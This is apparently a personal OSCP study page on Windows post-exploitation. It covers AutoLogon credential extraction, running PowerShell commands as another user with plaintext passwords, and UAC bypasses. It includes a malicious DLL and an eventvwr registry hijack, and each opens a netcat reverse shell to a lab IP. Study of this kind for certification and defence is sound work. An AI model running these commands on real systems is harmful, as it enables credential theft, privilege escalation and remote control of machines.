> For the complete documentation index, see [llms.txt](https://dhaneshsivasamy07.gitbook.io/oscp-2022/llms.txt). Markdown versions of documentation pages are available by appending `.md` to page URLs; this page is available as [Markdown](https://dhaneshsivasamy07.gitbook.io/oscp-2022/windows-post-exploitation/post-exploit-checks.md). # Post Exploit Checks ## Post Exploit * AutoLogon Credentials ``` reg query "HKLM\SOFTWARE\Microsoft\Windows NT\Currentversion\Winlogon" 2>null | findstr "DefaultUserName DefaultDomainName DefaultPassword" ``` * Enumerate open ports ```bash netstat -ano ``` ## Powershell ### PSCredentials * The PSCredentital Object is used to perform authenticated action / actions as another user in the machine ```powershell # create a PSCredential object $password = ConvertTo-SecureString "DNOscp1234!" -AsPainText -Force $credential = New-Object System.Management.Automation.PSCredential("Dhanesh", $password) # Export the credential to XML File $credential | Export-CliXml -Path 'C:\Location' # Import the xml file to obtain password $file = Import-CliXml -Path "C:\Location\File.xml" $file.GetNetworkCredential() | fl # Extra $file | Get-Member ``` * Execute Command as another user ( RUN-AS) ```powershell *Evil-WinRM* PS C:\PSTranscripts\20191203> whoami megabank\melanie *Evil-WinRM* PS C:\PSTranscripts\20191203> $password = ConvertTo-SecureString 'Serv3r4Admin4cc123!' -AsPlainText -Force *Evil-WinRM* PS C:\PSTranscripts\20191203> $cred = New-Object System.Management.Automation.PSCredential('ryan', $password) *Evil-WinRM* PS C:\PSTranscripts\20191203> invoke-command -ScriptBlock { whoami } -Computer localhost -Credential $cred megabank\ryan *Evil-WinRM* PS C:\PSTranscripts\20191203> # resolute machine ``` #### Machine * Reel - ## Privilege Escalation ### UAC * If a user belongs to the administrator groups and cannot execute the commands as Admin ( moving to Administrator's Desktop for eg.). Indicatest that there is a UAC is enabled * The bypass can also be checked with SharpUp.exe {% embed url="" %} Compiled Binaries {% endembed %} * The output of the sharpup.exe suggests the UAC can be bypassed ![Sharup.exe](/files/uq6v3Y6tQYMGcuuDuO0J) ### UAC Bypass **General Methods by *****ivanitlearning***** -** [**Here**](https://ivanitlearning.wordpress.com/2019/07/07/bypassing-default-uac-settings-manually/) #### 1. Mounting ![Mounting Bypass](/files/xlWQ5eeTKeCqg9NOVrsc) * With `net use n: \\127.0.0.1\C$` -> mounts the C directory as a new share as n #### 2. DLL Hijacking {% embed url="" %} UAC Bypass Via DLL Hijacking {% endembed %} 1. Create a malicious dll file {% code title="pwn.c" %} ```c #include BOOL WINAPI DllMain(HINSTANCE hinstDll, DWORD dwReason, LPVOID lpReserved ) { switch(dwReason) { case DLL_PROCESS_ATTACHED: // A process is loading the DLL. // do stuff WinExec("C:\\ProgramData\\nc.exe -e cmd.exe 10.10.14.9 1337", 0); break; case DLL_THREAD_ATTACHED: // A process is creating a new thread. break; case DLL_THREAD_DETACH: // A thread exits normally. break; case DLL_PROCESS_DETACH: // A process unloads the DLL. break; } return 0; } ``` {% endcode %} 2\. Compile the generated malicious dll ``` sudo apt-get install mingw-w64 i686-w64-mingw32-g++ pwn.c -lws2_32 -o srrstr.dll -shared ``` 3\. GreatSCT takes care of the rest #### 3. Akagi {% embed url="" %} * Compile the binary and use to bypass ![Shell as Administrator](/files/jZDeanQlZHrWi8uJoyf4) #### **4. FileLess UAC Bypass** **Windows 7** * Fileless UAC bypass, without using any applications to bypass the UAC * The registries are being used to perform the action * The detailed blog can be found [here](https://enigma0x3.net/2016/08/15/fileless-uac-bypass-using-eventvwr-exe-and-registry-hijacking/). ```bash # Summary: - The eventvwr.exe when loading will look for the entry HKCU\Software\Classes\mscfile\shell\open\command in the registry - By default, this registry won't exist so when analyzing with procmon, the registry status will be set to **NAME NOT FOUND** - The eventvwr also accesses the registry with high integrity ( accesses as the system user) - We can add a new entry to the registry and specify the command to be executed when eventvwr.exe executed ``` #### Commands ```bash # create a registry entry reg add hkcu\software\classes\mscfile\shell\open\command # provide the command to be executed reg add hkcu\software\classes\mscfile\shell\open\command /d "c:\windows\temp\nc.exe -e cmd.exe 10.10.10.10 1234" # run eventvwr.exe to execute the command eventvwr.exe ``` * Shell will be obtained as *NT Authority\System* --- # Agent Instructions This documentation is published with GitBook. GitBook is the documentation platform designed so that both humans and AI agents can read, navigate, and reason over technical content effectively. Learn more at gitbook.com. ## Querying This Documentation If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question. Perform an HTTP GET request on the current page URL with the `ask` query parameter, and the optional `goal` query parameter: ``` GET https://dhaneshsivasamy07.gitbook.io/oscp-2022/windows-post-exploitation/post-exploit-checks.md?ask=&goal= ``` `ask` is the immediate question: it should be specific, self-contained, and written in natural language. `goal` is optional and describes the broader end goal you are ultimately trying to accomplish on behalf of the user. GitBook uses it to tailor the answer towards what is most useful for that goal. The response will contain a direct answer to the question and relevant excerpts and sources from the documentation. Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.